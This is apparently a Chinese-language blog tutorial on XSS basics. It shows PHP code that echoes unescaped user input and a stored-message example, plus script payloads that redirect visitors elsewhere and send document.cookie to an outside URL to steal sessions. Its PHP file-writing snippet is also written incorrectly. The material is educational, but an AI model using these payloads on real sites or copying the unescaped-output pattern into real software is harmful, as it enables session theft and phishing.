XSS攻击基础

XSS攻击是一个非常常见的攻击。
  1.最简单版本:
  <?php
     $name = $_GET['name'];
     echo  " hello  <br >$name";
   ?>
   本意是获取到了test后,告诉用户test提交成功
   www.test.com以为是个安全连接一般用户会被认为是
   www.test.com?name=boy 这种:
 实际上攻击者写的
 www.shopxiong.com/xss.php?name=<script>window.onload=function(){
  window.location.href="http://www.baidu.com";
 }</script>
经过url编码后
www.test.com/xss.php?name=%3Cscript%3Ewindow.onload=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
用户可能还误以为在www.test.com站点,其实此时会自动跳转到baidu.com网站里面。如果此时A和B非常相似,没有注意此时已经不是A站了(最常见的是钓鱼站点),会泄漏自己的账号信息
2.对A站点发送了一个恶意攻击的语句
   恶意语句依然和上面一样:%3Cscript%3Ewindow.onload=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
  test1.php
 <?php
    $text =  file_put_contents($_GET['text'],1.txt);
  ?>
  另外一个页面对这些进行读取  test2.php
  <?php  echo   file_get_contents("1.txt");  ?>
  当你访问test.php  无奈的发现,每当访问那个网站,都会自动跳转到baidu.com页面
  场景:恶意攻击者给某个用户进行留言(但是留言没有经过严格过滤,直接进行了暂时性的保存)然后另外一个用户点击查看恶意攻击者给其的留言的时候,触发该脚本(跳转到另外一个页面或者弹窗)
3.窃取当前用户的session或者网站cookie,对用户进行虚拟模仿
     document.cookie(可以获取到用户的session和相关登录后信息)
   仍然和上面相似。恶意攻击者通过某种手段把数据提交后
   在另一个页面进行调用
   www.shopxiong.com/xss.php?name=<script>window.onload=function(){
  window.location.href="http://www.shopxiong.com/test3.php?c="+document.cookie
 }</script>
  窃取当前访问者的cookie 然后通过另一个访问链接进行保存

你可能感兴趣的:(XSS攻击基础)